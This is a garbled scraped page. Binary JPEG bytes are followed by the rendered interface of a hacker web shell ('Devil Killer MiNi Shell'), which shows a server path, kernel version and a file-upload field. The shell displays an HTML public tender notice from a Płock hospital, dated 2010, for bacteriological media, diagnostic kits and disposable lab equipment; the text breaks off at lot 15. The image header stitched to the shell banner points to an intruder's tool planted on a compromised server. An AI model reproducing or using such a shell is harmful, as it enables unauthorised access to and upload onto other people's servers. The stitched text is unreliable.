JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100428/100609-N-2010.html

<p class="kh_header"><b>Płock: Dostawa pożywek bakteriologicznych, zestawów diagnostycznych, drobnego sprzętu laboratoryjnego jednorazowego użytku, chemikaliów dla ZDL i ZB (23 pakiety)</b><br>
<b>Numer ogłoszenia: 100609 - 2010; data zamieszczenia: 28.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony , ul. Medyczna 19, 09-400 Płock, woj. mazowieckie, tel. 024 3646105, 3646330, faks 024 3646101,3646329.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pożywek bakteriologicznych, zestawów diagnostycznych, drobnego sprzętu laboratoryjnego jednorazowego użytku, chemikaliów dla ZDL i ZB (23 pakiety).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa pożywek bakteriologicznych, zestawów diagnostycznych, drobnego sprzętu laboratoryjnego jednorazowego użytku, chemikaliów dla ZDL i ZB (23 pakiety).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.16.25-7, 33.12.41.30-5, 33.14.10.00-0, 33.79.30.00-5, 24.96.00.00-1, 33.69.63.00-8, 33.14.15.80-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wynosi:

Pakiet nr	Wadium PLN 
1/ZB	2.040,00
2/ZB	5.240,00
3/ZB	1.600,00
4/ZB	820,00
5/ZB	110,00
9/ZB	120,00
12/ZB	280,00
13/ZB	130,00
15/ZB	130,00
17/ZB	350,00
2/ZDL	110,00
3/ZDL	170,00
5/ZDL	240,00
6/ZDL	640,00

Pozostałe pakiety- wadium nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty dotyczące przedmiotu zamówienia potwierdzające, iż oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego:
1. Do oferty na wyroby medyczne należy dołączyć zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom tj. 
-	deklarację zgodności wyrobu medycznego z określonymi dla niego wymaganiami zasadniczymi wystawioną przez wytwórcę lub autoryzowanego przedstawiciela
-	certyfikat CE wydany przez jednostkę notyfikacyjną potwierdzający spełnienie wymagań zasadniczych (certyfikat zezwalający na oznakowanie wyrobu znakiem CE), jeśli certyfikacja była prowadzona z udziałem jednostki notyfikującej (jeśli dotyczy)
- dokumenty potwierdzające dokonanie zgłoszenia wyrobu do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i do używania /zgłoszenia lub wpisy/, jeśli przepisy ustawy o wyrobach medycznych wymagają zgłoszenia lub o przyczynach braku zgłoszenia, jeśli przepisy o wyrobach medycznych nie wymagają zgłoszenia (podać klasę wyrobu, miejsce produkcji na terenie UE) lub z określonych powodów nie dokonano zgłoszenia.

2. Wykonawca musi dołączyć do oferty materiały informacyjne opisujące przedmiot zamówienia będące oficjalnymi katalogami, folderami, ulotkami reklamowymi itp. stosowanymi w powszechnych stosunkach handlowych, potwierdzające zgodność deklarowanych parametrów z danymi producenta lub oświadczenie producenta lub jego przedstawiciela na terenie Polski potwierdzające zgodność oferowanego asortymentu z wymogami Zamawiającego.

3. oświadczenie wykonawcy o spełnianiu przez oferowane produkty wymogów  Zamawiającego - podpisanie się pod zał. odpowiednio od nr 1.1 do nr 1.23 do SIWZ ( opis przedmiotu zamówienia) 

4.	certyfikat ISO 13485 - do pakietów nr: 1/ZB, 2/ZB, 3/ZB, 9/ZB, 13/ZB, 17/ZB.

5.	próbki wg informacji podanej w poszczególnych pakietach- nieodpłatnie, celem przetestowania; jeśli po przetestowaniu okaże się, że przedmiot zamówienia jest niezgodny z opisem przedmiotu zamówienia i  nie służy celowi, tak jak powinien, to będzie to stanowiło podstawę do odrzucenia oferty.


Inne:
1.	oświadczenie osoby uprawnionej do reprezentacji firmy (pełnomocnictwo) upoważniające do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli  
osobą podpisującą nie jest osoba upoważniona na podstawie wpisu do odpowiedniego rejestru lub ewidencji. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego powinno zawierać imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis (lub czytelny podpis). Jeżeli dołączone do oferty ww. pełnomocnictwo będzie w formie kopii, zamawiający wymaga by jego zgodność z oryginałem poświadczył notariusz.

2.	Potwierdzenie wniesienia wadium (np. wydruk dokonanego przelewu). Jeśli wadium jest wniesione w formie innej niż pieniężna - wymagany oryginał dokumentu wadialnego.

3.	Wypełnione w całości i podpisane załączniki  do SIWZ (bez projektu umowy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany  umowy wymagają zgody obu stron oraz pisemnego aneksu pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Pzp. 
Dopuszcza się zmiany umowy polegające na :
            -    zmianie formy organizacyjno-prawnej stron, nazwy lub podmiotów reprezentujących,
- zmianie jakości, parametrów lub innych cech charakterystycznych dla przedmiotu    zamówienia, jeśli nie były one istotnym elementem oferty podlegającym ocenie, w tym zmianę numeru katalogowego produktu bądź nazwy własnej produktu,
-  zmianę elementów składowych przedmiotu zamówienia na zasadzie ich uzupełnienia lub wymiany,
-  zmianę sposobu konfekcjonowania,
- zmianie postanowień umowy w przypadku zaistnienia okoliczności  tzw. siły wyższej tj. wydarzeń i okoliczności nadzwyczajnych, nieprzewidywalnych, niezależnych od dobrej woli i intencji  którejkolwiek ze stron umowy, które uniemożliwiają jednej ze stron wywiazanie się z postanowień zawartej umowy lub powodują rażącą stratę dla którejkolwiek ze stron umowy. W przypadku, gdy którakolwiek ze stron nie jest w stanie wywiązać się ze swych  zobowiązań umownych w związku z okolicznościami siły wyższej- druga strona powinna być poinformowana na piśmie, w terminie do 7 dni od momentu zaistnienia tych okoliczności, pod rygorem rozwiązania umowy w trybie natychmiastowym. Gdy okoliczności siły wyższej uniemożliwiają  jednej ze stron  umowy wywiązanie się ze swych zobowiązań umownych przez okres dłuższy niż  2 miesiące, strony umowy mogą  rozwiązać umowę w całości lub w części bez odszkodowania. W takim przypadku rozwiązania umowy, jej wykonanie i końcowe rozliczenie powinno być uzgodnione przez obie strony umowy.

2.1. Warunkami dokonania zmian wskazanych w pkt 2 tiret drugi , trzeci i czwarty mogą być następujące okoliczności:
- wprowadzony zostanie na rynek przez wykonawcę produkt zmodyfikowany bądź udoskonalony, 
- wystąpi przejściowy brak produktu przy jednoczesnej możliwości dostarczenia produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
- nastąpi zmiana organizacyjna po stronie Zamawiającego, w szczególności w zakresie organizacji pracy laboratorium, 
- wymagać   tego   będzie   prawidłowa   realizacja  przez   Zamawiającego   zadań   polegających   na wykonywaniu świadczeń diagnostycznych, 
- będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżenie awarii,
- będzie to konieczne ze względu na zmianę przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.wszplock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> -bip.wszplock.pl-bezpłatnie
-Sekcja Zamówień Publicznych, ul. Medyczna 19, 09-400 Płock, płatne 27,00 PLN w Kasie Szpitala lub przelewem bankowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2010 godzina 10:00, miejsce: Wojewódzki Szpital Zespolony, ul. Medyczna 19, 09-400 Płock, Sekcja Zamówień Publicznych (budynek główny WSZ- pok. 32).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1/ZB: PODŁOŻA DO POSIEWÓW KRWI I PŁYNÓW USTROJOWYCH W SYSTEMIE ZAMKNIĘTYM BACT-ALERT I MB-BACT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PODŁOŻA DO POSIEWÓW KRWI I PŁYNÓW USTROJOWYCH W SYSTEMIE ZAMKNIĘTYM BACT-ALERT I MB-BACT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2/ZB: ODCZYNNIKI BAKTERIOLOGICZNE DO HODOWLI , RÓŻNICOWANIA, IDENTYFIKACJI I OKREŚLANIA LEKOWRAŻLIWOŚCI DROBNOUSTROJÓW WRAZ ZE SZCZEPAMI WZORCOWYMI DO KONTROLI JAKOSCI MIKROBIOLOGICZNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI BAKTERIOLOGICZNE DO HODOWLI , RÓŻNICOWANIA, IDENTYFIKACJI I OKREŚLANIA LEKOWRAŻLIWOŚCI DROBNOUSTROJÓW WRAZ ZE SZCZEPAMI WZORCOWYMI DO KONTROLI JAKOSCI MIKROBIOLOGICZNEJ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.16.25-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3/ZB: ZESTAWY DIAGNOSTYCZNE DLA TLENOWCÓW I BEZTLENOWCÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZESTAWY DIAGNOSTYCZNE DLA TLENOWCÓW I BEZTLENOWCÓW.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.16.25-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4/ZB: SPRZĘT JEDNORAZOWY  I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SPRZĘT JEDNORAZOWY  I.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5/ZB: SPRZĘT JEDNORAZOWY  II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SPRZĘT JEDNORAZOWY  II.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6/ZB: SPRZĘT JEDNORAZOWY  III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SPRZĘT JEDNORAZOWY  III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7/ZB: SZKŁO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZKŁO.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.79.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8/ZB: PIPETY AUTOMATYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PIPETY AUTOMATYCZNE.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9/ZB: Supplement antyb.do podłoża dla Helicobacter pylori
Suplement antybiotykowy dla C.difficile ( na 0,5 l pożywki)
Amies Agar Gel ( zestaw transportowy dla beztlenowców  ) probówka z przewężeniem, prosimy o dostarczenie próbek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Supplement antyb.do podłoża dla Helicobacter pylori
Suplement antybiotykowy dla C.difficile ( na 0,5 l pożywki)
Amies Agar Gel ( zestaw transportowy dla beztlenowców  ) probówka z przewężeniem, prosimy o dostarczenie próbek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10/ZB: Zestaw lateksowy do identyfikacji C. difficile.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw lateksowy do identyfikacji C. difficile.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11/ZB: Test krążkowy do identyfikacji Gardnerella vaginalis
Test krążkowy do identyfikacji niezarodnikujących pałeczek G (-) beztlenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Test krążkowy do identyfikacji Gardnerella vaginalis
Test krążkowy do identyfikacji niezarodnikujących pałeczek G (-) beztlenowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12/ZB: KREW BARANIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KREW BARANIA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.15.80-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13/ZB: TESTY LATEKSOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TESTY LATEKSOWE.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.16.25-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14/ZB: Zestaw do oznaczania toksyn A i B dla C.difficile z kału i hodowli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do oznaczania toksyn A i B dla C.difficile z kału i hodowli.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15/ZB: TESTY DO OZNACZANIA H.PYLORI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TESTY DO OZNACZANIA H.PYLORI.</p></li>
